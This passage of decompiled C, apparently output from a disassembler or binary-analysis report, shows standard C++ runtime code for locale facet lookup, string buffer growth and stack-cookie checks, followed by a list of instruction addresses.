                                                				signed int _v136;
                                                				char _v140;
                                                				void* _v188;
                                                				void* _v204;
                                                				void* _v212;
                                                				intOrPtr _v216;
                                                				signed int _v220;
                                                				signed int _v224;
                                                				signed int _v228;
                                                				signed int _v232;
                                                				signed int _v236;
                                                				signed int _v240;
                                                				signed int _v244;
                                                				signed int _v248;
                                                				signed int _v252;
                                                				signed int _v256;
                                                				signed int _v260;
                                                				void* _v268;
                                                				intOrPtr _v272;
                                                				void* __esi;
                                                				signed int _t183;
                                                				signed int _t191;
                                                				signed int _t195;
                                                				void* _t202;
                                                				signed int _t211;
                                                				signed int _t219;
                                                				intOrPtr _t223;
                                                				signed int _t228;
                                                				void* _t237;
                                                				signed int _t241;
                                                				signed int _t242;
                                                				signed int _t243;
                                                				signed int _t244;
                                                				signed int _t245;
                                                				signed int _t246;
                                                				void* _t257;
                                                				signed int _t262;
                                                				signed int _t263;
                                                				signed int _t264;
                                                				unsigned int _t266;
                                                				void* _t267;
                                                				signed int _t283;
                                                				signed int _t285;
                                                				void* _t288;
                                                				void* _t289;
                                                				signed int _t291;
                                                				intOrPtr _t292;
                                                				signed int _t296;
                                                				signed int _t299;
                                                				signed int _t300;
                                                				void* _t305;
                                                				signed int _t310;
                                                				signed int _t311;
                                                				signed int _t316;
                                                				signed int _t317;
                                                				signed int _t318;
                                                				signed int _t319;
                                                				signed int _t320;
                                                				signed int _t321;
                                                				void* _t332;
                                                				signed int _t337;
                                                				signed int _t338;
                                                				unsigned int _t340;
                                                				signed int _t341;
                                                				void* _t342;
                                                				signed int _t343;
                                                				void* _t344;
                                                				unsigned int _t345;
                                                				signed int* _t346;
                                                				signed int _t347;
                                                				signed int _t348;
                                                				void* _t349;
                                                				intOrPtr _t354;
                                                				unsigned int _t360;
                                                				intOrPtr _t366;
                                                				intOrPtr _t371;
                                                				signed int _t382;
                                                				void* _t384;
                                                				void* _t387;
                                                				signed int _t396;
                                                				intOrPtr _t397;
                                                				signed int _t398;
                                                				signed int _t400;
                                                				void* _t401;
                                                				signed int _t402;
                                                				signed int _t403;
                                                				void* _t404;
                                                				signed int _t405;
                                                				void* _t406;
                                                				signed int _t407;
                                                				signed int _t414;
                                                				void* _t415;
                                                				signed int _t416;
                                                				void* _t417;
                                                				signed int _t418;
                                                				signed int _t419;
                                                				void* _t420;
                                                				signed int _t421;
                                                				signed int _t425;
                                                				signed int _t428;
                                                				signed int _t430;
                                                				signed int _t433;
                                                				signed int _t436;
                                                				signed int _t438;
                                                				signed int _t439;
                                                				void* _t446;
                                                				signed int _t447;
                                                				void* _t449;
                                                				signed int _t450;
                                                				void* _t452;
                                                				void* _t453;
                                                				signed int _t454;
                                                				void* _t456;
                                                				void* _t459;
                                                				void* _t460;
                                                				void* _t461;
                                                				void* _t467;
                                                				void* _t469;
                                                
                                                				_t395 = __edx;
                                                				_t447 = _t446 - 0x44;
                                                				_t183 =  *0xc42014; // 0x4fdfcf70
                                                				_v4 = _t183 ^ _t447;
                                                				_push(__ebx);
                                                				_t340 = _a4;
                                                				_push(__edi);
                                                				_v16 = _t340;
                                                				E00C153B9( &_v12, 0);
                                                				_t400 =  *0xc99858; // 0x2
                                                				_t433 =  *0xc99844; // 0x1672388
                                                				if(_t400 == 0) {
                                                					E00C153B9( &_v8, _t400);
                                                					_t469 =  *0xc99858 - _t400; // 0x2
                                                					if(_t469 == 0) {
                                                						_t337 =  *0xc98b50; // 0x3
                                                						_t338 = _t337 + 1;
                                                						 *0xc98b50 = _t338;
                                                						 *0xc99858 = _t338;
                                                					}
                                                					E00C15411( &_v8);
                                                					_t400 =  *0xc99858; // 0x2
                                                				}
                                                				_t354 =  *((intOrPtr*)(_t340 + 4));
                                                				_t341 = _t400 * 4;
                                                				if(_t400 >=  *((intOrPtr*)(_t354 + 0xc))) {
                                                					_t414 = 0;
                                                					__eflags = 0;
                                                					goto L8;
                                                				} else {
                                                					_t414 =  *(_t341 +  *((intOrPtr*)(_t354 + 8)));
                                                					if(_t414 == 0) {
                                                						L8:
                                                						__eflags =  *((char*)(_t354 + 0x14));
                                                						if( *((char*)(_t354 + 0x14)) == 0) {
                                                							L11:
                                                							__eflags = _t414;
                                                							if(_t414 != 0) {
                                                								goto L6;
                                                							} else {
                                                								goto L12;
                                                							}
                                                						} else {
                                                							_t332 = E00C15706();
                                                							__eflags = _t400 -  *((intOrPtr*)(_t332 + 0xc));
                                                							if(_t400 >=  *((intOrPtr*)(_t332 + 0xc))) {
                                                								L12:
                                                								__eflags = _t433;
                                                								if(__eflags == 0) {
                                                									_t414 = E00C171A1(_t414, __eflags, 8);
                                                									_t449 = _t447 + 4;
                                                									_t191 =  *(_v16 + 4);
                                                									__eflags = _t191;
                                                									if(_t191 == 0) {
                                                										_t402 = 0xc3f5cf;
                                                									} else {
                                                										_t402 =  *(_t191 + 0x18);
                                                										__eflags = _t402;
                                                										if(_t402 == 0) {
                                                											_t402 = _t191 + 0x1c;
                                                										}
                                                									}
                                                									E00C153B9( &_v64, 0);
                                                									_v64 = 0;
                                                									_v60 = 0;
                                                									_v56 = 0;
                                                									_v52 = 0;
                                                									_v48 = 0;
                                                									_v44 = 0;
                                                									_v40 = 0;
                                                									_v36 = 0;
                                                									_v32 = 0;
                                                									_v28 = 0;
                                                									_v24 = 0;
                                                									_v20 = 0;
                                                									__eflags = _t402;
                                                									if(_t402 == 0) {
                                                										E00C15580("bad locale name");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										_t450 = _t449 - 0x18;
                                                										_t195 =  *0xc42014; // 0x4fdfcf70
                                                										_v84 = _t195 ^ _t450;
                                                										_push(_t341);
                                                										_push(_t433);
                                                										_push(_t414);
                                                										_push(_t402);
                                                										_v96 = _v76;
                                                										E00C153B9( &_v88, 0);
                                                										_t403 =  *0xc9984c; // 0x3
                                                										_t343 =  *0xc9983c; // 0x1672e08
                                                										_v104 = _t343;
                                                										__eflags = _t403;
                                                										if(_t403 == 0) {
                                                											E00C153B9( &_v92, _t403);
                                                											__eflags =  *0xc9984c - _t403; // 0x3
                                                											if(__eflags == 0) {
                                                												_t310 =  *0xc98b50; // 0x3
                                                												_t311 = _t310 + 1;
                                                												__eflags = _t311;
                                                												 *0xc98b50 = _t311;
                                                												 *0xc9984c = _t311;
                                                											}
                                                											E00C15411( &_v92);
                                                											_t403 =  *0xc9984c; // 0x3
                                                										}
                                                										_t360 = _a4;
                                                										_t436 = _t403 * 4;
                                                										__eflags = _t403 -  *((intOrPtr*)(_t360 + 0xc));
                                                										if(_t403 >=  *((intOrPtr*)(_t360 + 0xc))) {
                                                											_t416 = 0;
                                                											__eflags = 0;
                                                											goto L41;
                                                										} else {
                                                											_t416 =  *( *((intOrPtr*)(_t360 + 8)) + _t436);
                                                											__eflags = _t416;
                                                											if(_t416 != 0) {
                                                												L49:
                                                												E00C15411( &_v88);
                                                												_pop(_t404);
                                                												_pop(_t417);
                                                												_pop(_t344);
                                                												__eflags = _v84 ^ _t450;
                                                												return E00C17193(_t416, _t344, _v84 ^ _t450, _t395, _t404, _t417);
                                                											} else {
                                                												L41:
                                                												__eflags =  *((char*)(_t360 + 0x14));
                                                												if( *((char*)(_t360 + 0x14)) == 0) {
                                                													L44:
                                                													__eflags = _t416;
                                                													if(_t416 != 0) {
                                                														goto L49;
                                                													} else {
                                                														goto L45;
                                                													}
                                                												} else {
                                                													_t305 = E00C15706();
                                                													__eflags = _t403 -  *((intOrPtr*)(_t305 + 0xc));
                                                													if(_t403 >=  *((intOrPtr*)(_t305 + 0xc))) {
                                                														L45:
                                                														__eflags = _t343;
                                                														if(_t343 == 0) {
                                                															_push(_v96);
                                                															_t202 = E00C14D50(_t343, _t395,  &_v100);
                                                															_t452 = _t450 + 8;
                                                															__eflags = _t202 - 0xffffffff;
                                                															if(__eflags == 0) {
                                                																E00C11810();
                                                																asm("int3");
                                                																asm("int3");
                                                																asm("int3");
                                                																asm("int3");
                                                																_push(_t360);
                                                																_push(_t343);
                                                																_push(_t416);
                                                																_t418 =  *(_t452 + 0x10);
                                                																_t345 = _t360;
                                                																 *((intOrPtr*)(_t452 + 8)) = _v100;
                                                																__eflags = _t418 - 0x7ffffffe;
                                                																if(__eflags > 0) {
                                                																	L71:
                                                																	E00C112D0(_t360, __eflags);
                                                																	goto L72;
                                                																} else {
                                                																	_push(_t436);
                                                																	_t436 =  *(_t345 + 0x14);
                                                																	_t430 = _t418 | 0x00000007;
                                                																	_push(_t403);
                                                																	__eflags = _t430 - 0x7ffffffe;
                                                																	if(_t430 <= 0x7ffffffe) {
                                                																		_t360 = _t436 >> 1;
                                                																		__eflags = _t436 - 0x7ffffffe - _t360;
                                                																		if(_t436 <= 0x7ffffffe - _t360) {
                                                																			_t288 = _t360 + _t436;
                                                																			__eflags = _t430 - _t288;
                                                																			_t418 =  <  ? _t288 : _t430;
                                                																			_t289 = _t418 + 1;
                                                																			__eflags = _t289 - 0x7fffffff;
                                                																			if(_t289 > 0x7fffffff) {
                                                																				goto L70;
                                                																			} else {
                                                																				_t291 = _t289 + _t289;
                                                																				__eflags = _t291 - 0x1000;
                                                																				if(_t291 < 0x1000) {
                                                																					__eflags = _t291;
                                                																					if(__eflags == 0) {
                                                																						_t403 = 0;
                                                																						__eflags = 0;
                                                																					} else {
                                                																						_t299 = E00C171A1(_t418, __eflags, _t291);
                                                																						_t452 = _t452 + 4;
                                                																						_t403 = _t299;
                                                																					}
                                                																					goto L64;
                                                																				} else {
                                                																					goto L58;
                                                																				}
                                                																			}
                                                																		} else {
                                                																			_t418 = 0x7ffffffe;
                                                																			_t291 = 0xfffffffe;
                                                																			goto L58;
                                                																		}
                                                																	} else {
                                                																		_t418 = 0x7ffffffe;
                                                																		_t291 = 0xfffffffe;
                                                																		L58:
                                                																		_t80 = _t291 + 0x23; // 0x80000022
                                                																		_t360 = _t80;
                                                																		__eflags = _t360 - _t291;
                                                																		if(__eflags <= 0) {
                                                																			L70:
                                                																			E00C11250();
                                                																			goto L71;
                                                																		} else {
                                                																			_t300 = E00C171A1(_t418, __eflags, _t360);
                                                																			_t452 = _t452 + 4;
                                                																			__eflags = _t300;
                                                																			if(_t300 == 0) {
                                                																				L72:
                                                																				L134();
                                                																				asm("int3");
                                                																				_t453 = _t452 - 0xc;
                                                																				_t396 =  *(_t453 + 0x10);
                                                																				_push(_t345);
                                                																				_t346 = _t360;
                                                																				_v124 =  *((intOrPtr*)(_t453 + 0x18));
                                                																				_push(_t436);
                                                																				_t438 = _t346[4];
                                                																				__eflags = 0x7fffffff - _t438 - _t396;
                                                																				if(__eflags < 0) {
                                                																					E00C112D0(0x7fffffff, __eflags);
                                                																					goto L93;
                                                																				} else {
                                                																					_push(_t418);
                                                																					_t264 = _t396 + _t438;
                                                																					_v132 = _t264;
                                                																					_t425 = _t264 | 0x0000000f;
                                                																					_push(_t403);
                                                																					_t403 = _t346[5];
                                                																					_v128 = _t403;
                                                																					__eflags = _t425 - 0x7fffffff;
                                                																					if(__eflags <= 0) {
                                                																						_t266 = _t403 >> 1;
                                                																						__eflags = _t403 - 0x7fffffff - _t266;
                                                																						if(__eflags <= 0) {
                                                																							_t267 = _t266 + _t403;
                                                																							__eflags = _t425 - _t267;
                                                																							_t418 =  <  ? _t267 : _t425;
                                                																						} else {
                                                																							_t418 = 0x7fffffff;
                                                																						}
                                                																					} else {
                                                																						_t418 = 0x7fffffff;
                                                																					}
                                                																					_t382 =  ~(0 | __eflags > 0x00000000) | _t418 + 0x00000001;
                                                																					__eflags = _t382 - 0x1000;
                                                																					if(_t382 < 0x1000) {
                                                																						__eflags = _t382;
                                                																						if(__eflags == 0) {
                                                																							_t403 = 0;
                                                																							__eflags = 0;
                                                																						} else {
                                                																							_t283 = E00C171A1(_t418, __eflags, _t382);
                                                																							_t453 = _t453 + 4;
                                                																							_t403 = _t283;
                                                																						}
                                                																						goto L86;
                                                																					} else {
                                                																						_t102 = _t382 + 0x23; // 0x23
                                                																						_t284 = _t102;
                                                																						__eflags = _t102 - _t382;
                                                																						if(__eflags <= 0) {
                                                																							L93:
                                                																							E00C11250();
                                                																							goto L94;
                                                																						} else {
                                                																							_t285 = E00C171A1(_t418, __eflags, _t284);
                                                																							_t453 = _t453 + 4;
                                                																							__eflags = _t285;
                                                																							if(_t285 == 0) {
                                                																								L94:
                                                																								L134();
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								asm("int3");
                                                																								_t454 = _t453 - 0x88;
                                                																								_t211 =  *0xc42014; // 0x4fdfcf70
                                                																								_v136 = _t211 ^ _t454;
                                                																								_push(_t346);
                                                																								_t347 = _v128;
                                                																								_push(_t438);
                                                																								_push(_t418);
                                                																								_push(_t403);
                                                																								_v216 = _t347;
                                                																								E00C153B9(_t454 + 0x80, 0);
                                                																								_t405 =  *0xc98b64; // 0x1
                                                																								_t439 =  *0xc99840; // 0x166e9d0
                                                																								__eflags = _t405;
                                                																								if(_t405 == 0) {
                                                																									E00C153B9( &_v140, _t405);
                                                																									__eflags =  *0xc98b64 - _t405; // 0x1
                                                																									if(__eflags == 0) {
                                                																										_t262 =  *0xc98b50; // 0x3
                                                																										_t263 = _t262 + 1;
                                                																										__eflags = _t263;
                                                																										 *0xc98b50 = _t263;
                                                																										 *0xc98b64 = _t263;
                                                																									}
                                                																									E00C15411( &_v140);
                                                																									_t405 =  *0xc98b64; // 0x1
                                                																								}
                                                																								_t366 =  *((intOrPtr*)(_t347 + 4));
                                                																								_t348 = _t405 * 4;
                                                																								__eflags = _t405 -  *((intOrPtr*)(_t366 + 0xc));
                                                																								if(_t405 >=  *((intOrPtr*)(_t366 + 0xc))) {
                                                																									_t419 = 0;
                                                																									__eflags = 0;
                                                																									goto L103;
                                                																								} else {
                                                																									_t419 =  *(_t348 +  *((intOrPtr*)(_t366 + 8)));
                                                																									__eflags = _t419;
                                                																									if(_t419 == 0) {
                                                																										L103:
                                                																										__eflags =  *((char*)(_t366 + 0x14));
                                                																										if( *((char*)(_t366 + 0x14)) == 0) {
                                                																											L106:
                                                																											__eflags = _t419;
                                                																											if(_t419 != 0) {
                                                																												goto L101;
                                                																											} else {
                                                																												goto L107;
                                                																											}
                                                																										} else {
                                                																											_t257 = E00C15706();
                                                																											__eflags = _t405 -  *((intOrPtr*)(_t257 + 0xc));
                                                																											if(_t405 >=  *((intOrPtr*)(_t257 + 0xc))) {
                                                																												L107:
                                                																												__eflags = _t439;
                                                																												if(__eflags == 0) {
                                                																													_t419 = E00C171A1(_t419, __eflags, 0x44);
                                                																													_t456 = _t454 + 4;
                                                																													_t219 =  *(_v216 + 4);
                                                																													__eflags = _t219;
                                                																													if(_t219 == 0) {
                                                																														_t407 = 0xc3f5cf;
                                                																													} else {
                                                																														_t407 =  *(_t219 + 0x18);
                                                																														__eflags = _t407;
                                                																														if(_t407 == 0) {
                                                																															_t407 = _t219 + 0x1c;
                                                																														}
                                                																													}
                                                																													_t370 = _t456 + 0x14;
                                                																													E00C153B9(_t456 + 0x14, 0);
                                                																													 *(_t456 + 0x14) = 0;
                                                																													_v260 = 0;
                                                																													_v256 = 0;
                                                																													_v252 = 0;
                                                																													_v248 = 0;
                                                																													_v244 = 0;
                                                																													_v240 = 0;
                                                																													_v236 = 0;
                                                																													_v232 = 0;
                                                																													_v228 = 0;
                                                																													_v224 = 0;
                                                																													_v220 = 0;
                                                																													__eflags = _t407;
                                                																													if(_t407 == 0) {
                                                																														E00C15580("bad locale name");
                                                																														asm("int3");
                                                																														asm("int3");
                                                																														asm("int3");
                                                																														asm("int3");
                                                																														asm("int3");
                                                																														asm("int3");
                                                																														asm("int3");
                                                																														asm("int3");
                                                																														asm("int3");
                                                																														asm("int3");
                                                																														asm("int3");
                                                																														asm("int3");
                                                																														asm("int3");
                                                																														asm("int3");
                                                																														_t371 = _v272;
                                                																														_t223 =  *((intOrPtr*)(_t456 + 4));
                                                																														__eflags = _t371 - 0x1000;
                                                																														if(_t371 < 0x1000) {
                                                																															L131:
                                                																															_v272 = _t371;
                                                																															 *((intOrPtr*)(_t456 + 4)) = _t223;
                                                																															_push(_t439);
                                                																															return L00C179FA( *((intOrPtr*)(_t456 + 8)));
                                                																														} else {
                                                																															_t397 =  *((intOrPtr*)(_t223 - 4));
                                                																															_t371 = _t371 + 0x23;
                                                																															__eflags = _t223 - _t397 + 0xfffffffc - 0x1f;
                                                																															if(__eflags > 0) {
                                                																																_push(_t419);
                                                																																_t421 = _t419 ^ _t419;
                                                																																E00C1D8EA(_t371, _t421, __eflags, _t421, _t421, _t421, _t421, _t421);
                                                																																_push(_t421);
                                                																																_push(_t421);
                                                																																_push(_t421);
                                                																																_push(_t421);
                                                																																_push(_t421);
                                                																																L135();
                                                																																asm("int3");
                                                																																_t228 = IsProcessorFeaturePresent(0x17);
                                                																																__eflags = _t228;
                                                																																if(_t228 != 0) {
                                                																																	_push(5);
                                                																																	asm("int 0x29");
                                                																																}
                                                																																_push(_t421);
                                                																																E00C1D7A2(_t348, _t397, 0xc0000417, 2, 0xc0000417, 1);
                                                																																return TerminateProcess(GetCurrentProcess(), 0xc0000417);
                                                																															} else {
                                                																																_t223 = _t397;
                                                																																goto L131;
                                                																															}
                                                																														}
                                                																													} else {
                                                																														E00C1580C(_t370, _t456 + 0x10, _t407); // executed
                                                																														 *(_t419 + 4) = 0;
                                                																														 *_t419 = 0xc342ac;
                                                																														E00C16D84(_t407, _t419, __eflags, _t456 + 0x50);
                                                																														_t459 = _t456 + 0xc;
                                                																														asm("movups xmm0, [eax]");
                                                																														asm("movups [esi+0x8], xmm0");
                                                																														_t237 = E00C16DEF(__eflags, _t459 + 0x58);
                                                																														_t460 = _t459 + 4;
                                                																														asm("movups xmm0, [eax]");
                                                																														asm("movups [esi+0x18], xmm0");
                                                																														asm("movups xmm0, [eax+0x10]");
                                                																														asm("movups [esi+0x28], xmm0");
                                                																														asm("movq xmm0, [eax+0x20]");
                                                																														asm("movq [esi+0x38], xmm0");
                                                																														 *((intOrPtr*)(_t419 + 0x40)) =  *((intOrPtr*)(_t237 + 0x28));
                                                																														E00C15857(_t370, _t460 + 0x10);
                                                																														_t241 = _v220;
                                                																														_t461 = _t460 + 4;
                                                																														__eflags = _t241;
                                                																														if(_t241 != 0) {
                                                																															E00C1CD40(_t241);
                                                																															_t461 = _t461 + 4;
                                                																														}
                                                																														_t242 = _v228;
                                                																														_v220 = 0;
                                                																														__eflags = _t242;
                                                																														if(_t242 != 0) {
                                                																															E00C1CD40(_t242);
                                                																															_t461 = _t461 + 4;
                                                																														}
                                                																														_t243 = _v236;
                                                																														_v228 = 0;
                                                																														__eflags = _t243;
                                                																														if(_t243 != 0) {
                                                																															E00C1CD40(_t243);
                                                																															_t461 = _t461 + 4;
                                                																														}
                                                																														_t244 = _v244;
                                                																														_v236 = 0;
                                                																														__eflags = _t244;
                                                																														if(_t244 != 0) {
                                                																															E00C1CD40(_t244);
                                                																															_t461 = _t461 + 4;
                                                																														}
                                                																														_t245 = _v252;
                                                																														_v244 = 0;
                                                																														__eflags = _t245;
                                                																														if(_t245 != 0) {
                                                																															E00C1CD40(_t245);
                                                																															_t461 = _t461 + 4;
                                                																														}
                                                																														_t246 = _v260;
                                                																														_v252 = 0;
                                                																														__eflags = _t246;
                                                																														if(_t246 != 0) {
                                                																															E00C1CD40(_t246);
                                                																															_t461 = _t461 + 4;
                                                																														}
                                                																														_v260 = 0;
                                                																														E00C15411(_t461 + 0x10);
                                                																														E00C156DA(__eflags, _t419);
                                                																														_t454 = _t461 + 4;
                                                																														 *((intOrPtr*)( *_t419 + 4))();
                                                																														 *0xc99840 = _t419;
                                                																														goto L101;
                                                																													}
                                                																												} else {
                                                																													_t419 = _t439;
                                                																													goto L101;
                                                																												}
                                                																											} else {
                                                																												_t419 =  *(_t348 +  *((intOrPtr*)(_t257 + 8)));
                                                																												goto L106;
                                                																											}
                                                																										}
                                                																									} else {
                                                																										L101:
                                                																										E00C15411(_t454 + 0x8c);
                                                																										_pop(_t406);
                                                																										_pop(_t420);
                                                																										_pop(_t349);
                                                																										__eflags = _v136 ^ _t454;
                                                																										return E00C17193(_t419, _t349, _v136 ^ _t454, _t396, _t406, _t420);
                                                																									}
                                                																								}
                                                																							} else {
                                                																								_t103 = _t285 + 0x23; // 0x23
                                                																								_t403 = _t103 & 0xffffffe0;
                                                																								 *(_t403 - 4) = _t285;
                                                																								L86:
                                                																								_t346[4] = _v132;
                                                																								_t346[5] = _t418;
                                                																								_t426 = _t403 + _t438;
                                                																								__eflags = _v128 - 0x10;
                                                																								_v132 = _v104 + _t403 + _t438;
                                                																								_push(_t438);
                                                																								if(_v128 < 0x10) {
                                                																									_push(_t346);
                                                																									_push(_t403);
                                                																									E00C18460();
                                                																									E00C18460(_t426, _v124, _v104);
                                                																									 *_v132 = 0;
                                                																									 *_t346 = _t403;
                                                																									return _t346;
                                                																								} else {
                                                																									_t428 =  *_t346;
                                                																									_push(_t428);
                                                																									_push(_t403);
                                                																									E00C18460();
                                                																									E00C18460(_t403 + _t438, _v124, _v104);
                                                																									_t453 = _t453 + 0x18;
                                                																									_t384 = _v128 + 1;
                                                																									 *_v132 = 0;
                                                																									__eflags = _t384 - 0x1000;
                                                																									if(_t384 < 0x1000) {
                                                																										L90:
                                                																										_push(_t384);
                                                																										_push(_t428);
                                                																										L133();
                                                																										 *_t346 = _t403;
                                                																										return _t346;
                                                																									} else {
                                                																										_t396 =  *(_t428 - 4);
                                                																										_t384 = _t384 + 0x23;
                                                																										_t418 = _t428 - _t396;
                                                																										_t118 = _t418 - 4; // 0x7ffffffb
                                                																										__eflags = _t118 - 0x1f;
                                                																										if(_t118 > 0x1f) {
                                                																											goto L94;
                                                																										} else {
                                                																											_t428 = _t396;
                                                																											goto L90;
                                                																										}
                                                																									}
                                                																								}
                                                																							}
                                                																						}
                                                																					}
                                                																				}
                                                																			} else {
                                                																				_t81 = _t300 + 0x23; // 0x23
                                                																				_t403 = _t81 & 0xffffffe0;
                                                																				 *(_t403 - 4) = _t300;
                                                																				L64:
                                                																				_t292 =  *((intOrPtr*)(_t452 + 0x18));
                                                																				 *(_t345 + 0x14) = _t418;
                                                																				 *((intOrPtr*)(_t345 + 0x10)) = _t292;
                                                																				_t418 = _t292 + _t292;
                                                																				E00C18460(_t403,  *((intOrPtr*)(_t452 + 0x14)), _t418);
                                                																				_t452 = _t452 + 0xc;
                                                																				 *((short*)(_t418 + _t403)) = 0;
                                                																				__eflags = _t436 - 8;
                                                																				if(_t436 < 8) {
                                                																					L69:
                                                																					 *_t345 = _t403;
                                                																					return _t345;
                                                																				} else {
                                                																					_t296 =  *_t345;
                                                																					_t387 = 2 + _t436 * 2;
                                                																					__eflags = _t387 - 0x1000;
                                                																					if(_t387 < 0x1000) {
                                                																						L68:
                                                																						_push(_t387);
                                                																						_push(_t296);
                                                																						L133();
                                                																						goto L69;
                                                																					} else {
                                                																						_t398 =  *(_t296 - 4);
                                                																						_t360 = _t387 + 0x23;
                                                																						__eflags = _t296 - _t398 + 0xfffffffc - 0x1f;
                                                																						if(_t296 - _t398 + 0xfffffffc > 0x1f) {
                                                																							goto L72;
                                                																						} else {
                                                																							_t296 = _t398;
                                                																							goto L68;
                                                																						}
                                                																					}
                                                																				}
                                                																			}
                                                																		}
                                                																	}
                                                																}
                                                															} else {
                                                																_t416 = _v96;
                                                																E00C156DA(__eflags, _t416);
                                                																_t395 =  *_t416;
                                                																_t450 = _t452 + 4;
                                                																 *((intOrPtr*)( *_t416 + 4))();
                                                																 *0xc9983c = _t416;
                                                																goto L49;
                                                															}
                                                														} else {
                                                															_t416 = _t343;
                                                															goto L49;
                                                														}
                                                													} else {
                                                														_t416 =  *( *((intOrPtr*)(_t305 + 8)) + _t436);
                                                														goto L44;
                                                													}
                                                												}
                                                											}
                                                										}
                                                									} else {
                                                										E00C1580C( &_v64,  &_v64, _t402);
                                                										 *(_t414 + 4) = 0;
                                                										 *_t414 = 0xc34fc4;
                                                										E00C15857( &_v64,  &_v64);
                                                										_t316 = _v20;
                                                										_t467 = _t449 + 0xc;
                                                										__eflags = _t316;
                                                										if(_t316 != 0) {
                                                											E00C1CD40(_t316);
                                                											_t467 = _t467 + 4;
                                                										}
                                                										_t317 = _v28;
                                                										_v20 = 0;
                                                										__eflags = _t317;
                                                										if(_t317 != 0) {
                                                											E00C1CD40(_t317);
                                                											_t467 = _t467 + 4;
                                                										}
                                                										_t318 = _v36;
                                                										_v28 = 0;
                                                										__eflags = _t318;
                                                										if(_t318 != 0) {
                                                											E00C1CD40(_t318);
                                                											_t467 = _t467 + 4;
                                                										}
                                                										_t319 = _v44;
                                                										_v36 = 0;
                                                										__eflags = _t319;
                                                										if(_t319 != 0) {
                                                											E00C1CD40(_t319);
                                                											_t467 = _t467 + 4;
                                                										}
                                                										_t320 = _v52;
                                                										_v44 = 0;
                                                										__eflags = _t320;
                                                										if(_t320 != 0) {
                                                											E00C1CD40(_t320);
                                                											_t467 = _t467 + 4;
                                                										}
                                                										_t321 = _v60;
                                                										_v52 = 0;
                                                										__eflags = _t321;
                                                										if(_t321 != 0) {
                                                											E00C1CD40(_t321);
                                                											_t467 = _t467 + 4;
                                                										}
                                                										_v60 = 0;
                                                										E00C15411( &_v64);
                                                										E00C156DA(__eflags, _t414);
                                                										_t447 = _t467 + 4;
                                                										 *((intOrPtr*)( *_t414 + 4))();
                                                										 *0xc99844 = _t414;
                                                										goto L6;
                                                									}
                                                								} else {
                                                									_t414 = _t433;
                                                									goto L6;
                                                								}
                                                							} else {
                                                								_t414 =  *(_t341 +  *((intOrPtr*)(_t332 + 8)));
                                                								goto L11;
                                                							}
                                                						}
                                                					} else {
                                                						L6:
                                                						E00C15411( &_v12);
                                                						_pop(_t401);
                                                						_pop(_t415);
                                                						_pop(_t342);
                                                						return E00C17193(_t414, _t342, _v4 ^ _t447, _t395, _t401, _t415);
                                                					}
                                                				}
                                                			}





















































































































































                                                0x00c14070
                                                0x00c14070
                                                0x00c14073
                                                0x00c1407a
                                                0x00c1407e
                                                0x00c1407f
                                                0x00c14089
                                                0x00c1408c
                                                0x00c14090
                                                0x00c14095
                                                0x00c1409b
                                                0x00c140a3
                                                0x00c140aa
                                                0x00c140af
                                                0x00c140b5
                                                0x00c140b7
                                                0x00c140bc
                                                0x00c140bd
                                                0x00c140c2
                                                0x00c140c2
                                                0x00c140cb
                                                0x00c140d0
                                                0x00c140d0
                                                0x00c140d6
                                                0x00c140d9
                                                0x00c140e3
                                                0x00c1410d
                                                0x00c1410d
                                                0x00000000
                                                0x00c140e5
                                                0x00c140e8
                                                0x00c140ed
                                                0x00c1410f
                                                0x00c1410f
                                                0x00c14113
                                                0x00c14125
                                                0x00c14125
                                                0x00c14127
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c14115
                                                0x00c14115
                                                0x00c1411a
                                                0x00c1411d
                                                0x00c14129
                                                0x00c14129
                                                0x00c1412b
                                                0x00c14138
                                                0x00c1413a
                                                0x00c14141
                                                0x00c14144
                                                0x00c14146
                                                0x00c14154
                                                0x00c14148
                                                0x00c14148
                                                0x00c1414b
                                                0x00c1414d
                                                0x00c1414f
                                                0x00c1414f
                                                0x00c1414d
                                                0x00c1415f
                                                0x00c14166
                                                0x00c1416e
                                                0x00c14173
                                                0x00c1417b
                                                0x00c14180
                                                0x00c14188
                                                0x00c1418d
                                                0x00c14191
                                                0x00c14196
                                                0x00c1419a
                                                0x00c1419e
                                                0x00c141a2
                                                0x00c141a6
                                                0x00c141a8
                                                0x00c14292
                                                0x00c14297
                                                0x00c14298
                                                0x00c14299
                                                0x00c1429a
                                                0x00c1429b
                                                0x00c1429c
                                                0x00c1429d
                                                0x00c1429e
                                                0x00c1429f
                                                0x00c142a0
                                                0x00c142a3
                                                0x00c142aa
                                                0x00c142ae
                                                0x00c142af
                                                0x00c142b8
                                                0x00c142b9
                                                0x00c142bc
                                                0x00c142c0
                                                0x00c142c5
                                                0x00c142cb
                                                0x00c142d1
                                                0x00c142d5
                                                0x00c142d7
                                                0x00c142de
                                                0x00c142e3
                                                0x00c142e9
                                                0x00c142eb
                                                0x00c142f0
                                                0x00c142f0
                                                0x00c142f1
                                                0x00c142f6
                                                0x00c142f6
                                                0x00c142ff
                                                0x00c14304
                                                0x00c14304
                                                0x00c1430a
                                                0x00c1430d
                                                0x00c14314
                                                0x00c14317
                                                0x00c14325
                                                0x00c14325
                                                0x00000000
                                                0x00c14319
                                                0x00c1431c
                                                0x00c1431f
                                                0x00c14321
                                                0x00c14379
                                                0x00c1437d
                                                0x00c14388
                                                0x00c14389
                                                0x00c1438b
                                                0x00c1438c
                                                0x00c14396
                                                0x00c14323
                                                0x00c14327
                                                0x00c14327
                                                0x00c1432b
                                                0x00c1433d
                                                0x00c1433d
                                                0x00c1433f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c1432d
                                                0x00c1432d
                                                0x00c14332
                                                0x00c14335
                                                0x00c14341
                                                0x00c14341
                                                0x00c14343
                                                0x00c14349
                                                0x00c14352
                                                0x00c14357
                                                0x00c1435a
                                                0x00c1435d
                                                0x00c14397
                                                0x00c1439c
                                                0x00c1439d
                                                0x00c1439e
                                                0x00c1439f
                                                0x00c143a0
                                                0x00c143a5
                                                0x00c143a6
                                                0x00c143a7
                                                0x00c143ab
                                                0x00c143ad
                                                0x00c143b1
